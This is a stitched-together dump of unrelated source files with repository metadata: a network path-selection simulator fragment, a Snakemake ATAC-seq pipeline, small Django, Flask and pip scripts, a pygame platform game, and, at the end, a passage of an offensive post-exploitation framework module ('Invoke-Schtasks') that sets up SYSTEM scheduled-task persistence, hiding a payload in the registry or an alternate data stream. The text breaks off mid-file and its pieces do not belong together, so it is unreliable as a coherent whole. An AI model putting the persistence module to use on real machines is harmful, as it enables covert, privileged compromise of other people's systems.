bool_whether_this_new_path_is_feasible = self.Check_whether_this_new_path_is_feasible_to_the_SrcCFlow(Src,Dst_new,PathID_new);
if 1==bool_whether_this_new_path_is_feasible:
### !!!! --- 2.2.1 Check whether this key exists.
if (Src,Dst_new) not in self.PathSet_selected.keys():
self.PathSet_selected[(Src,Dst_new)] = []; ##self.PathSet_selected???????
### !!!! --- 2.2.2 Adopt this one.
#print "test begin4"
#print "PathID_new"+" "+PathID_new+"\n"
#print "PathID_new not in self.PathSet_selected[(Src,Dst_new)]"+" "+PathID_new not in self.PathSet_selected[(Src,Dst_new)]
if PathID_new>=0 and (PathID_new not in self.PathSet_selected[(Src,Dst_new)]):
#print "test bedin3"
self.PathSet_selected[(Src,Dst_new)].append(PathID_new)
#print "test end3"
#print "test end4"
#### !!!!! ===== 2.3 Filter and Delete irregular path-items.
for (SrcCF,DstMB) in self.PathSet_selected.keys():
Host_DstMB_of_this_SrcCF = self.find_holding_MBox_of_a_SrcCFlow(SrcCF);
if (DstMB != Host_DstMB_of_this_SrcCF):
del self.PathSet_selected[(SrcCF,DstMB)]### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Delete_expired_timer_items_after_replacement(self,Src_CFlow):
#global self.Timers;
if Src_CFlow in self.Timers.keys():
del self.Timers[Src_CFlow]### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
##### In this function, I only check the link bandwidth is feasible or not.
def Check_whether_this_new_path_is_feasible_to_the_SrcCFlow(self,Src,Dst_new,Path_ID_new):
##(0 is false, 1 is true)
#self.Log_debug.write("\n\t ============ !!! In Check_whether_this_new_path Function, ---- Path_ID_new"+" "+str(Path_ID_new))
if Path_ID_new<0:
return 0
#self.f1.write("\n Location 333333333333333 \n")
## --- 1. get all the traversing arcs in the new path.
list_arcs_in_this_path = self.Get_all_arcs_in_a_specified_path( Path_ID_new );
#self.Log_debug.write("\n\tlist_arcs_in_this_path"+" "+str(list_arcs_in_this_path)+"\n" )
## --- 2. calculate all the currently-accumulative-assigned TrafficRate(TR) in each traversed arc.
#self.Log_debug.write("\n\t ----- location 0 \n" )
#self.f1.write("\n Location 6666666666666 \n")
## --- 2.1 Check the traffic-rate in each arc of this path.
for (u,v) in list_arcs_in_this_path:
available_TR_in_uv = 0.0
summed_TR_in_uv = 0.0###Initialized to 0.
## -- 2.1.1 Get the available-tr-in-uv in the simulation-manner.(2016-01-27)
if (1 == self.Style_of_throughput_by_simulation_or_Mininet):
## 2.1.1.1 summate all the traffic-rate in (u,v).
#self.f1.write("\n Location 77777777777 \n")
for key,val in self.PathSet_selected.items():
#self.f1.write("\n Location 77777777777-2222 \n")
src = key[0]
if (len(val)>0):
for idx_pathID in range(0, len(val)):
path_IU_sdi = val[idx_pathID];
#self.Log_debug.write("\n\t ----- location 1 \n" )
list_arcs_in_path_sdi = self.Get_all_arcs_in_a_specified_path( path_IU_sdi );
#self.Log_debug.write("\n\t ----- location 2 \n" )
if (u,v) in list_arcs_in_path_sdi:
summed_TR_in_uv += self.TDSet[src];
## 2.1.1.2 get the available_TR_in_uv.
available_TR_in_uv = self.Cap_links[(u,v)] - summed_TR_in_uv;## This is the simulation-style.
self.Log_debug.write("\t------------- 2.1.1.2 summed_TR_in_uv_estimated_in_simulation: "
+ str(summed_TR_in_uv)+"\n")
self.Log_debug.flush()
## -- 2.1.1-ver2: Get the available-tr-in-uv in the emulation(mininet-running)-manner.(2016-01-27)
elif (0 == self.Style_of_throughput_by_simulation_or_Mininet):
summed_TR_in_uv = self.objNetworkMonitor.get_used_bw(u,v);
available_TR_in_uv = self.Cap_links[(u,v)] - summed_TR_in_uv;
self.Log_debug.write("\t------------- 2.1.1-ver2 summed_TR_in_uv_measured_in_mininet: "
+ str(summed_TR_in_uv)+"\n")
self.Log_debug.flush()
## -- 2.1.2 Compare the available TR bandwidth in each arc with the demanding TR of this Src_CFlow.
demanding_TR_of_SrcCFlow = self.TDSet[Src];
if ( demanding_TR_of_SrcCFlow > available_TR_in_uv ):
return 0### Cannot statisfy this SrcCFlow, return false.
## --- 3. If all arcs in this path can satisfy this SrcCFlow, return 1(Yes).
#self.f1.write("\n Location 8888888888888 \n")
return 1
### --- End of this function :~
# ==========================================================================================
# ==========================================================================================
## This function is for estimating the throughput-performance of the "next" state, if swap a pair of paths(one In-Use(IU) path and one Not-In-Use(NIU) path).
def Fake_Replace_DstMBox_and_Path_for_a_SrcCFlow_to_return_estimated_sysObj(self,Src, DstMBox_old, Dst_new, PathID_old, PathID_new):
# -- 1. Fake-Replace the host-MBox and Path, only for estimating the next-config-objVal.
self.Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow(Src, DstMBox_old, Dst_new, PathID_old, PathID_new);
# -- 2. ESTIMATE the Throughput' after swapping the host-MBox and path;
estimated_sysObj = self.Get_objVal_of_configurations_in_whole_system();
# -- 3. Swap-BACK of the host-MBox and Path, after estimating the next-config-objVal.
self.Replace_the_selected_DstMBox_and_Path_for_a_SrcCFlow(Src, Dst_new, DstMBox_old, PathID_new, PathID_old);
return estimated_sysObj# --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Get_all_arcs_in_a_specified_path(self, path_id ):
retlist_Arcs = []; ## [ arcs_(u,v) in this path]
## -- 1. Analyse and record all arc-links in this path.
if path_id in self.Paths_set.keys():
list_path_content = self.Paths_set[path_id];
## -- 1.1 ## Analyze all arcs in this path.
for node_idx in range(len(list_path_content)):
if (node_idx+1) < len(list_path_content):
u = list_path_content[node_idx];
v = list_path_content[node_idx+1];
## -- 1.2 ## Record this arcs_list into retList.
if (u,v) not in retlist_Arcs:
retlist_Arcs.append((u,v));
## -- 2. Return the obtained linksSet in this path.
return retlist_Arcs## --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Get_all_arcs_in_each_path_from_given_pathSet(self, dictPathSet ):
#### ------ Get all the arcs in given dictPathSet.
retDict_Arcs_in_each_Path = {}; ## {(Src,Dst, path_id):[ arcs_(u,v) in this path] }, the arcs in path-set for all pairs.
## -- 1. Analyse each selected-path in val, get and record all arc-links in this path.
for key,val in dictPathSet.items():
Src = key[0]
Dst = key[1]
for idx_pathID in range(0, len(val)):
path_id = val[idx_pathID];
listPath_i = self.Paths_set[path_id];
## -- 1.1 ## Record all arcs in this path.
for node_idx in range(len(listPath_i)):
if (node_idx+1) < len(listPath_i):
u = listPath_i[node_idx];
v = listPath_i[node_idx+1];
## -- 1.1.2 ## Record this arcs_list into retDict.
if (Src,Dst,path_id) not in retDict_Arcs_in_each_Path.keys():
retDict_Arcs_in_each_Path[(Src,Dst,path_id)] = [];
retDict_Arcs_in_each_Path[(Src,Dst,path_id)].append((u,v));
else:
retDict_Arcs_in_each_Path[(Src,Dst,path_id)].append((u,v));
## -- 2. Return the obtained linksSet in each path.
return retDict_Arcs_in_each_Path## --- End of this function :~
# ==========================================================================================
def Whether_the_given_arc_in_this_ArcSetOfAPath(self, pairGivenArc, listArcs_in_a_path ):
ret_status = 0; ## 0: no; 1:yes.
for arc in listArcs_in_a_path:
if arc[0]==pairGivenArc[0] and arc[1]==pairGivenArc[1]: ## (u,v) == (u,v)
return 1;
return ret_status## --- End of this function :~
# ==========================================================================================
def Remove_a_path_from_pathSet(self, path_id, pathSet, key_in_pathSet ):
pathSet[key_in_pathSet].remove(path_id)## --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Call_and_record_system_performance(self, current_ts, step_times, Cumulative_RESET_times, Cumulative_TimerExpiration_times):
#### --- 1. Get the global system utility.
Throughput = self.Get_objVal_of_configurations_in_whole_system();
#### --- 2. Get the largest link utility.
Largest_link_utility = 0;
Largest_node_utility = 0;
Largest_link_utility,Largest_node_utility = self.Get_largest_utility_of_both_links_and_nodes();
#### --- 3. Get the largest node utility.
#### --- Last. Record them together.
self.Log.write('-ts\t%f\t-steps\t%d\t-Throughput\t%f\t-CNT_reset\t%d\t-CNT_TimerExpiration\t%d\t-MaxLinkCost\t%f\t-MaxNodeCost\t%f\t-self.Beta\t%s\n'%(current_ts, step_times, Throughput, Cumulative_RESET_times, Cumulative_TimerExpiration_times, Largest_link_utility, Largest_node_utility,self.Beta ))# --- End of this function :~
# ==========================================================================================
# ==========================================================================================
def Write_down_the_current_solution_MBox_Path_assignment(self, Current_ts ):
Throughput = self.Get_objVal_of_configurations_in_whole_system();
self.LogRun.write( '\n\t ==================== Solutions at -current-TS[ %s ] -Throughput[ %s ] ==================== \n'%(Current_ts,Throughput))
### ---- 1. Solution of Middle-box
self.LogRun.write('#### MiddleBox-id : [list of the assigned Src-ClientFlow-id]\n')
for Mbox_ID in self.MBoxSet_assigned.keys():
self.LogRun.write( '\t\t ~~~~ self.MBoxSet_assigned[ %s ]: %s \n'%(Mbox_ID, self.MBoxSet_assigned[Mbox_ID]) )
### ---- 2. Solution of Path selection
self.LogRun.write('\n#### Src-ClientFlow-id, DstMiddleBox-id : selected-path-id\n')
#print self.PathSet_selected.keys ##by gzq
#print self.PathSet_selected.items ##by gzq
#print self.PathSet_selected.values ##by gzq
for key,val in self.PathSet_selected.items():
SrcCF = key[0]
DstMB = key[1]
listPath = val
self.LogRun.write( '\t\t ~~~~ SrcCF[ %s ] DstMB[ %s ]: %s \n'%(SrcCF,DstMB,listPath ) )
# ==========================================================================================
def Record_final_result(self,current_ts, step_times, Cumulative_RESET_times, Cumulative_TimerExpiration_times):
#global self.PathSet_selected
#### --- 1. Get the global system utility.
Throughput = self.Get_objVal_of_configurations_in_whole_system();
#### --- 2. Get the largest link/node utility.
Largest_link_utility = 0;
Largest_node_utility = 0;
Largest_link_utility,Largest_node_utility = self.Get_largest_utility_of_both_links_and_nodes();
#### --- 3. Record them together.
###### ---- 3.1 calculate the Qos-Satisfication-Ratio (QSR) over all ClientFlows (TDs)
TotalNum_TDs = len(self.TDSet);
Num_satisfied_TDs = 0;
for val in self.PathSet_selected.values():
if len(val) > 0 and val[0] >= 0:
Num_satisfied_TDs += 1;
QSR = (1.0*Num_satisfied_TDs)/TotalNum_TDs;
###### ---- 3.2 record them all
#self.Log_final_result.write('-ts\t%f\t-steps\t%d\t-Throughput\t%f\t-CNT_reset\t%d\t-CNT_TimerExpiration\t%d\t-MaxLinkCost\t%f\t-MaxNodeCost\t%f\t-self.Beta\t%s\t-QSR\t%f\t-CapLink\t%f\n'%(current_ts, step_times, Throughput, Cumulative_RESET_times, Cumulative_TimerExpiration_times, Largest_link_utility, Largest_node_utility,self.Beta,QSR,self.Cap_links["0000000000000003","0000000000000002"] ))# --- End of this function :~
# ==========================================================================================
##############################################################################################
# ========================================= USE-CASE =========================================
| [
"zhiqiangguo0727@163.com"
] | zhiqiangguo0727@163.com |
db23d33034ebba116edc28042f519ac25f386964 | 0811c142b31feca2800c615dc148eb8de8aaabcc | /ATAC_seq/Snakefile | 9d6c3dba7adbee05d0b70323f576457266260353 | [] | no_license | kwells4/ATAC_RNA_Tonsils | 2254d279ec420b4531c844d2c064717f1981a306 | 1d335ceab56aff81c80b027a7bf3f03af9abec6f | refs/heads/master | 2023-04-13T20:46:32.008885 | 2021-04-28T23:42:00 | 2021-04-28T23:42:00 | 361,899,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,868 | from snakemake.utils import min_version
##### set minimum snakemake version #####
min_version("5.1.4")
##### load config file #####
configfile: "config.yaml"
CLUSTERS = ["C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9", "C10", "C11", "C12", "C13", "C14"]
def make_fastq_list(wildcards):
fastq_list = []
for run_name in config["run_names"]:
fastq_file = run_name + "/" + run_name + "_mkfastq/outs/fastq_path"
fastq_list.append(fastq_file)
fastq_group = ",".join(fastq_list)
return(fastq_group)
rule all:
input:
# Here you need to add in your run name as it appears in the config file
# You can have multiple runs
#expand("{run_name}/{sample}/{sample}_count", run_name = "scATAC_190814", sample = config["scATAC_190814"]),
#expand("{run_name}/{sample}/{sample}_count", run_name = "scATAC_190819", sample = config["scATAC_190819"])
# If all runs have the same structure, use:
expand("{sample}/outs", sample = config["samples"])
rule count_wo_hap:
input:
expand("{sample}_no_hap/outs", sample = config["samples"])
rule bam_clusters:
input:
expand("subset_bams/clusters/{sample}_cluster_{cluster}.bam", sample = config["samples"], cluster = CLUSTERS)
rule bam_RNA_clusters:
input:
expand("subset_bams/RNA_clusters/{sample}_cluster_{cluster}.bam", sample = config["samples"], cluster = config["RNA_clusters"])
rule mkfastq:
input:
runDir="{run_name}/{run_name}_raw_data",
sampleSheet="{run_name}/{run_name}_barcodes.csv"
output:
directory("{run_name}/{run_name}_mkfastq/outs/fastq_path")
params:
sampleID="{run_name}_mkfastq",
sampleName="{run_name}",
runDirP="{run_name}_raw_data",
sampleSheetP="{run_name}_barcodes.csv"
threads: 30
shell:
"""
module load biology
module load bcl2fastq/2.20
cd {params.sampleName}
rm -r {params.sampleID}
cellranger-atac mkfastq --run={params.runDirP} --samplesheet={params.sampleSheetP} --id={params.sampleID} --localcores={threads} --qc
cd ..
"""
rule count:
input:
fastq_file=expand("{run_name}/{run_name}_mkfastq/outs/fastq_path", run_name = config["run_names"]),
#fastq_file=make_fastq_list,
ref=config['reference']
output: directory("{sample}_w_hap/outs")
params:
sampleID="{sample}",
sampleName="{sample}",
mem=config['mem'],
fastq_files=make_fastq_list
threads: 30
shell:
"""
cellranger-atac count --id={params.sampleID} --fastqs={params.fastq_files} --sample={params.sampleName} --reference={input.ref} --localcores={threads} --localmem={params.mem}
"""
rule count_no_hap:
input:
fastq_file=expand("{run_name}/{run_name}_mkfastq/outs/fastq_path", run_name = config["run_names"]),
#fastq_file=make_fastq_list,
ref=config['no_hap_reference']
output: directory("{sample}_no_hap/outs")
params:
sampleID="{sample}_no_hap",
sampleName="{sample}",
mem=config['mem'],
fastq_files=make_fastq_list
threads: 30
shell:
"""
cellranger-atac count --id={params.sampleID} --fastqs={params.fastq_files} --sample={params.sampleName} --reference={input.ref} --localcores={threads} --localmem={params.mem}
"""
rule subset_bam:
input:
cell_file = "ArchR_analysis_scg4/Tonsils_harmony/files/{cluster_type}/{sample}_cluster_{cluster}.tsv",
bam_file = "{sample}_no_hap_1/outs/possorted_bam.bam"
output:
out_bam = "subset_bams/{cluster_type}/{sample}_cluster_{cluster}.bam"
threads: 10
shell:
"""
subset-bam --bam={input.bam_file} --cell-barcodes={input.cell_file} --cores={threads} --out-bam={output.out_bam}
"""
| [
"kwells4@stanford.edu"
] | kwells4@stanford.edu | |
a16f328dd2cb0803be2c8147bb5eb9e368e730f3 | c8bca1efec748f91aa1203010d1fbcc95ecf0df1 | /venv/src/BlogHunter/venv/Scripts/pip3-script.py | 19d2b716f23468d75c7b16ca950bad0b78e4b996 | [] | no_license | Shadab420/BlogHunter | b3e4be34ccfb68a4027cec6728ebf19da4a499a1 | 2cc23dcd33675600ee620eeb607c1fd62496a057 | refs/heads/master | 2020-05-20T02:29:56.775188 | 2019-05-07T13:31:23 | 2019-05-07T13:31:23 | 185,332,167 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | #!G:\my_projects\Web-Apps\PY-Django-projects\venv\src\BlogHunter\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
| [
"shadab_anwar@outlook.com"
] | shadab_anwar@outlook.com |
aaed02e64433a4bf43522a02ca8dab7afed13952 | 4735f992d44c40f3b3c595d25b5d2169aca63451 | /apps/standards/app_pipeline/migrations/0003_auto_20180530_1206.py | 29aeb2d19d87cc9c4e60a5e2c2da28ef014a8de3 | [
"MIT"
] | permissive | lulzzz/Plan | 11dec989e079e080c3b38a5347d19bf243c3bdf5 | 4c665aa7f764184a31a7cb4ec0de08cecad3ee3a | refs/heads/master | 2020-03-23T10:59:24.494710 | 2018-06-28T07:03:39 | 2018-06-28T07:03:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-05-30 04:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app_pipeline', '0002_auto_20180528_2219'),
]
operations = [
migrations.AddField(
model_name='metadata',
name='sheet_name',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='metadata',
name='database_table',
field=models.CharField(max_length=100, unique=True),
),
migrations.AlterField(
model_name='metadata',
name='filename',
field=models.CharField(max_length=100),
),
]
| [
"florian.gamper@datacrag.com"
] | florian.gamper@datacrag.com |
bdb1769291b0eb7eaa1c52f8234aa8806de31199 | fc58366ed416de97380df7040453c9990deb7faa | /tools/dockerize/webportal/usr/share/openstack-dashboard/openstack_dashboard/dashboards/admin/zones/images/forms.py | d66f6a73b791797eb062a03977c79ce131fd57e7 | [
"Apache-2.0"
] | permissive | foruy/openflow-multiopenstack | eb51e37b2892074234ebdd5b501b24aa1f72fb86 | 74140b041ac25ed83898ff3998e8dcbed35572bb | refs/heads/master | 2016-09-13T08:24:09.713883 | 2016-05-19T01:16:58 | 2016-05-19T01:16:58 | 58,977,485 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import exceptions
from openstack_dashboard import api
class RebuildForm(forms.SelfHandlingForm):
def handle(self, request, data):
try:
api.proxy.image_rebuild(request, self.initial['zone_id'])
except Exception:
exceptions.handle(request, _('Unable to rebuild images.'))
return True
| [
"wenxiang.wang1204@gmail.com"
] | wenxiang.wang1204@gmail.com |
284d6deab8454d9a2b67f62d9f0d175f81f7a40e | 5ed917ada5766c0a028914f2c15549b6a9095b53 | /pyt/bin/jupyter-run | e4ec181cf191420b70e1674aa991452d2b6a3d3a | [] | no_license | shreyanshu007/backup | eb53c3cc44b17e1bcaa42ff2f46ea9364f1bcdfc | 5a0a4c9715375ae224db8c0f427f847022a9af02 | refs/heads/master | 2023-01-12T13:33:04.174671 | 2020-06-12T06:00:53 | 2020-06-12T06:00:53 | 201,099,769 | 0 | 0 | null | 2023-01-04T06:33:29 | 2019-08-07T17:46:24 | Python | UTF-8 | Python | false | false | 267 | #!/home/shreyanshu/sem_fir/pyt/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.runapp import RunApp
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(RunApp.launch_instance())
| [
"2016csb1060@iitrpr.ac.in"
] | 2016csb1060@iitrpr.ac.in | |
e5cf83464f56094ca25471ffb0ca0ff6556b8a61 | 281d4e963b898b426e06ca3ccd45fd2dc107bf38 | /venv/bin/flask | f3825005348fc2f48ca7d92be1af68a5394c70af | [] | no_license | savigaur2/pokemon-data-analysis | c45835e424dd19e3065e04dc97839d3ffd56e154 | 428f66820f3c2f3f378ac79391c8217fec1358de | refs/heads/main | 2023-01-15T23:01:26.930953 | 2020-11-22T03:50:38 | 2020-11-22T03:50:38 | 313,149,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | #!/Users/apple/Documents/DataScienceProjects/PokemonDataAnalysis/api/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"apple@Apples-MacBook-Pro.local"
] | apple@Apples-MacBook-Pro.local | |
15b1a1d4f9ebb15aa6436c196700db433477e5fb | 346c3cba30bb3cfcdbae76d0f4ad551ff8612ace | /Game_class.py | 17c08316ab635ec293bf70d71a45e2c82561f815 | [] | no_license | Grantrd/P0_Final_Project_Grantr | 08bddd8df8e2d7ba8d845f474a21a79c9611c017 | 793ab9fd8854cd1953b5df406dad92726f623fdc | refs/heads/master | 2021-08-28T11:46:46.809809 | 2017-12-12T04:46:11 | 2017-12-12T04:46:11 | 110,902,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,809 | py | ######################################################################
# Author: Rodney Grant
# Username: GrantR
#
# Assignment: P0_Final
#
# Purpose: To demonstrate my knowledge of programming and make a fun Mario Clone
# ###############################################################################
from pygame import *
from hero_class import*
import platform_class
from enemy_class import *
import unittest
"""Method Allows the game to take player input and use it to move the player"""
def player_input(event, floor, hero_y, jump, x_change, y_change):
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
x_change = -5
if event.key == pygame.K_RIGHT:
x_change = 5
if hero_y >= (floor - 10):
if event.key == pygame.K_SPACE:
if not jump:
y_change = -10
else:
y_change = 10
elif event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
x_change = 0
if event.key == pygame.K_SPACE:
if jump:
y_change = 5
return x_change, y_change
def gravity(floor, hero, jump, x_change, y_change):
hero.jumpable(x_change, y_change, floor)
if hero.y >= floor:
jump = False
if hero.y < floor:
jump = True
if hero.y > floor:
hero.y = floor
return jump
def winner(display_width, display_height, floor, gameDisplay, hero, one, textsurface, white):
if floor == one.y:
if 440 > hero.x > 400:
if 280 > hero.y:
gameDisplay.fill(white)
gameDisplay.blit(textsurface, (int(display_width / 6 - 110), int(display_height / 2)))
win = True
else:
win = False
else:
win = False
else:
win = False
return win
def lose(display_width, floor, hero, snowman):
if hero.crash(snowman.x, snowman.y) == 1:
hero.y = -100
floor = -100
elif hero.crash(snowman.x, snowman.y) == 2:
snowman.y = -100
if hero.x > display_width:
hero.y = -100
if hero.x < -65:
hero.y = -100
return floor
def platform(floor, hero, one, two):
if one.x < hero.x < (one.x + one.length) and hero.y <= one.y:
floor = one.y
elif two.x < hero.x < (two.x + two.length) and hero.y <= two.y:
floor = two.y
else:
floor = 504
return floor
def testit(did_pass):
linenum = sys._getframe(1).f_lineno # Get the caller's line number.
if did_pass:
msg = "Game Test at line {0} ok.".format(linenum)
else:
msg = ("Game Test at line {0} FAILED.".format(linenum))
print(msg)
def game_test_suite(hero, gameDisplay, textsurface, one, snowman, two):
hero.y = 504
hero.x = 600
testit(gravity(504, hero, True, -10, 0) == False)
testit(gravity(504, hero, True, 0, -10) == True)
testit(gravity(504, hero, True, 500, 0) == False)
testit(gravity(504, hero, True, 0, 300) == True)
testit(winner(800, 600, 504, gameDisplay, hero, one, textsurface, (255, 255, 255)) == False)
hero.x = 420
hero.y = 278
testit(winner(800, 600, 504, gameDisplay, hero, one, textsurface, (255, 255, 255)) == True)
snowman.x = 100
snowman.y = 504
testit(lose(800, 504, hero, snowman) == 504)
snowman.x = 600
snowman.y = 504
hero.y = 504
hero.x = 600
testit(lose(800, 504, hero, snowman) == -100)
snowman.x = 300
snowman.y = 504
testit(lose(800, 504, hero, snowman) == -100)
hero.x = 350
hero.y = 325
testit(platform(504, hero, one, two) == 328)
hero.x = 130
hero.y = 405
testit(platform(504, hero, one, two) == 407)
hero.x = 300
hero.y = 400
testit(platform(504, hero, one, two) == 328)
hero.x = 0
hero.y = 0
testit(platform(504, hero, one, two) == 407)
def main():
"""setup Screen"""
pygame.init()
display_width = 800
display_height = 600
pygame.font.init()
myfont = pygame.font.SysFont('Comic Sans MS', 90)
"""Colors"""
black = (0, 0, 0)
white = (255, 255, 255)
red = (255, 0, 0)
blue = (0, 0, 255)
green = (0, 255, 0)
"""setup Game"""
coin = pygame.image.load('coin.png')
gameDisplay = pygame.display.set_mode((display_width, display_height))
pygame.display.set_caption('penguin_ario')
clock = pygame.time.Clock()
floor = int(.84 * display_height)
"""enemy - to be class"""
hero = Hero('animal.png', gameDisplay, floor)
snowman = Enemy('enemy.png', gameDisplay, display_height)
"""setup screen"""
win = False
x = int(display_width * 0.45)
y = floor
x_change = 0
jump = False
y_change = 0
textsurface = myfont.render('Congratulations You win', False, (0, 0, 0))
"""game loop"""
crashed = False
while not crashed:
background = pygame.image.load('background2.png').convert()
for event in pygame.event.get():
if event.type == pygame.QUIT:
crashed = True
x_change, y_change = player_input(event, floor, hero.y, jump, x_change, y_change)
"""platforms, in progress"""
one = platform_class.Platform(324, 328, 185, gameDisplay)
two = platform_class.Platform(77, 407, 186, gameDisplay)
"""gameScreen"""
hero.display()
snowman.display(snowman.x)
snowman.track(hero.x)
"""background"""
gameDisplay.fill(white)
gameDisplay.blit(background, [0, 0])
snowman.display(snowman.x)
snowman.track(hero.x)
gameDisplay.blit(coin, (430, 270))
"""platform"""
one.draw(white, 5)
two.draw(white, 5)
hero.display()
"""actors... Acting"""
jump = gravity(floor, hero, jump, x_change, y_change)
"""Selects the necessary platform to make solid"""
floor = platform(floor, hero, one, two)
"""Kills the enemy, or the penguin"""
floor = lose(display_width, floor, hero, snowman)
"""ends the game loop"""
crashed = hero.game_over()
"""Allows fish coin collecting and winning"""
win = winner(display_width, display_height, floor, gameDisplay, hero, one, textsurface, green)
"""refresh screen"""
pygame.display.update()
if win:
crashed = True
pygame.time.delay(2000)
"""clock for ...something later"""
clock.tick(60)
pygame.quit()
"""end of game loop"""
hero.hero_test_suite()
one.platform_test_suite()
two.platform_test_suite()
snowman.enemy_test_suite()
game_test_suite(hero, gameDisplay, textsurface, one, snowman, two)
main()
| [
"grantr@berea.edu"
] | grantr@berea.edu |
0066871fb2d3c40eea27833787de3a9206f8f37a | d489eb7998aa09e17ce8d8aef085a65f799e6a02 | /lib/modules/powershell/persistence/elevated/schtasks.py | 5874e2f11964b3771e9313b017de312179d76575 | [
"MIT"
] | permissive | fengjixuchui/invader | d36078bbef3d740f95930d9896b2d7dd7227474c | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | refs/heads/master | 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 | MIT | 2019-09-26T11:32:39 | 2019-09-07T11:32:17 | PowerShell | UTF-8 | Python | false | false | 10,401 | py | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a payload (or script) using schtasks running as SYSTEM. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'OnLogon' : {
'Description' : 'Switch. Trigger script on user logon.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:\Software\Microsoft\Network\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a payload.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
onLogon = self.options['OnLogon']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
if extFile != '':
# read in an external file as the payload and build a
